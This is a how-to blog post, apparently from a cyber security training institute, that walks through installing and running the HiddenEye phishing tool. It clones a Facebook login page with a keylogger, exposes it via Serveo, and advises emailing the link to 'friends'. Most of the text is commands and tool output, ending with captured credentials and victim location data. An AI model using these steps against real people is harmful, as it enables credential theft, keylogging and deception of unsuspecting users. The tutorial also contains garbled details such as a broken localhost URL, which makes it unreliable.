Phishing is what mostly victims fall into trap of fake pages. There are many of methods for creating fake pages. Phishing is an way to obtain login credentials such as usernames & passwords or confidential details by creating cloned pages of original web pages. According to ethical hacking researcher of international institute of cyber security most of the attacks are done using phishing techniques.
Even phishing is still most popular cyber attack used by many attackers/ spammers. We will show python script written in python. Modern phishing tool is used phishing tool which gives wide variety of social networks.
- For testing we will use Ubuntu 16.04.3 LTS 64 Bit. Install python3, php7, wget. For that type sudo apt-get update && sudo apt-get install python3, sudo apt-get install python-pip3, sudo apt-get install wget.
- After installing above requirements. Type git clone https://github.com/DarkSecDevelopers/HiddenEye.git
- Then type cd HiddenEye && ls
- Type pip3 install -r requirements.txt
- Type python3 HiddenEye.py
- Type y
HURRAY!! Internet is available.. We can Continue PHP INSTALLATION FOUND [*] HiddenEye is Opening. Please Wait…100% [!] Do you agree to use this tool for educational purposes only? (y/n) HiddenEye >>> y
- Type 1
██ ██ ██ ██████ ██████ ███████ ███ ██ ███████ ██ ██ ███████
██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██
███████ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ███████ ████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██
██ ██ ██ ██████ ██████ ███████ ██ ███ ███████ ██ ███████
v0.2.7 BY:DARKSEC
[ Modern Phishing Tool With Advanced Functionality ]
[ PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------
SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:
------------------------
[1] Facebook [10] Yahoo [19] Pinterest [28] DropBox
[2] Google [11] Twitch [20] ProtonMail [29] eBay
[3] LinkedIn [12] Microsoft [21] Spotify [30] MySpace
[4] GitHub [13] Steam [22] Quora [31] PayPal
[5] StackOverflow [14] VK [23] PornHub [32] Shopify
[6] WordPress [15] iCloud [24] Adobe [33] Verizon
[7] Twitter [16] GitLab [25] Badoo [34] Yandex
[8] Instagram [17] Netflix [26] CryptoCurrency [35] Reddit
[9] Snapchat [18] Origin [27] DevianArt
HiddenEye >>>- Type 3
[*] SELECT ANY ONE MODE… Operation mode: [1] Standard Page Phishing [2] Advanced Phishing-Poll Ranking Method(Poll_mode/login_with) [3] Facebook Phishing- Fake Security issue(security_mode) [4] Facebook Phising-Messenger Credentials(messenger_mode) HiddenEye >>> 3
- Type Y
_ _ . ___ ___ ___ _ _ ___ _ _ ___
|__| | ] | ] | |__ |\ | |__ \__/ |__
| | | ]__| ]__| |__ | \| |__ || |__
https://github.com/darksecdevelopers
** BY: DARKSEC **
-------------------------------
[ KEYLOGGER PROMPT ]!!
-------------------------------[*]DO YOU WANT TO ADD A KEYLOGGER IN PHISHING PAGE-(Y/N) YOUR CHOICE >>> Y
- Type www.facebook.com
_ _ . ___ ___ ___ _ _ ___ _ _ ___
|__| | ] | ] | |__ |\ | |__ \__/ |__
| | | ]__| ]__| |__ | \| |__ || |__
https://github.com/darksecdevelopers
** BY:DARKSEC **
-------------------------------
[ PUT YOUR REDIRECTING URL HERE ]
-------------------------------**(Choose Wisely As Your Victim Will Redirect to This Link) **(Do not leave it blank. Unless Errors may occur) [*]Insert a custom redirect url: REDIRECT HERE>>> www.facebook.com
- Type 443
[ WEBSERVER PORT SELECTION ]!! [*]Select Any Available Port [1-65535]: HiddenEye >>> 443
- Type 2
[ HOST SERVER SELECTION ]!! [!](SERVEO WORKS BETTER) [*]Select Any Available Server: [1]Ngrok [2]Serveo HiddenEye >>> 2
- Type 2
[ SERVEO URL TYPE SELECTION ]!! [!]REMEMBER ? Serveo Don't Allows Phishing. [!]They Drops The Connection Whenever Detects Phishing. [*]CHOOSE ANY SERVEO URL TYPE TO GENERATE PHISHING LINK: [1]Custom URL (Generates designed url) [2]Random URL (Generates Random url) YOUR CHOICE >>> 2 [ RANDOM SERVEO URL ]!! [!] SEND THIS SERVEO URL TO VICTIMS- [] Localhost URL: https://127.0.0.1:443 [] SERVEO URL: https://viduo.serveo.net ………………………………………………………………. [!] IF FOUND SEGMENTATION FAULT, IT MEANS THE SERVER FAILED. | [!] THEN YOU HAVE TO RUN IT AGAIN. | [!] Use This Command In Another Terminal. | (cd Server/www/ && php -S 127.0.0.1:443 > /dev/null) | ………………………………………………………………. [*] Waiting For Victim Interaction. Keep Eyes On Requests Coming From Victim … ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- Open another temrinal & go to below location cd /home/iicybersecurity/HiddenEye/ Server/www/ && php -S 127.0.0.1:443 > /dev/null
root@ubuntu:/home/iicybersecurity/HiddenEye# cd Server/www/ && php -S 127.0.0.1:443 > /dev/null [Fri Aug 2 03:55:35 2019] 127.0.0.1:37156 [200]: /keylogger.php?c= [Fri Aug 2 03:55:36 2019] 127.0.0.1:37158 [200]: /keylogger.php?c= [Fri Aug 2 03:55:37 2019] 127.0.0.1:37160 [200]: /keylogger.php?c= [Fri Aug 2 03:55:38 2019] 127.0.0.1:37162 [200]: /keylogger.php?c= [Fri Aug 2 03:55:39 2019] 127.0.0.1:37164 [200]: /keylogger.php?c= [Fri Aug 2 03:55:40 2019] 127.0.0.1:37166 [200]: /keylogger.php?c= [Fri Aug 2 03:55:41 2019] 127.0.0.1:37168 [200]: /keylogger.php?c= [Fri Aug 2 03:55:42 2019] 127.0.0.1:37170 [200]: /keylogger.php?c= [Fri Aug 2 03:55:43 2019] 127.0.0.1:37172 [200]: /keylogger.php?c= [Fri Aug 2 03:55:44 2019] 127.0.0.1:37174 [200]: /keylogger.php?c=
- As you will open https://127.0.0.1:443 in your web browser. You will see victim interaction where you have started server.
- Enter username & password.
- For sending fake page to your friends you can send fake email to your friends using public URL generated, in this case it is https://viduo.seveo.net. You can send https://viduo.seveo.net & you can also check using your loopback URL for testing on Ubuntu machine, https://127/0/0/1:443
- After entering username & password. You will found login credentials in terminal where you have started HiddenEye.py
………………………………………………………… [ CREDENTIALS FOUND ]: ………………………………………………………… [EMAIL]; meetmichael@gmail.com [PASS]: michael@12345 ………………………………………………………… [ VICTIM INFO FOUND ]: Victim Public IP: 220.59.157.158 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Current logged in user: root Longitude: 79.0005 Latitude: 22.6000 ISP: AS17813 Country: IN Region: Delhi City: Delhi ………………………………………………………… …………………………. ………………………….
- Above you can see login credentials
- All these scenarios are demonstrated in ethical hacking courses offered by International Institute of Cyber Security
Cyber Security Researcher. Information security specialist, currently working as risk infrastructure specialist & investigator. He is a cyber-security researcher with over 25 years of experience. He has served with the Intelligence Agency as a Senior Intelligence Officer. He has also worked with Google and Citrix in development of cyber security solutions. He has aided the government and many federal agencies in thwarting many cyber crimes. He has been writing for us in his free time since last 5 years.
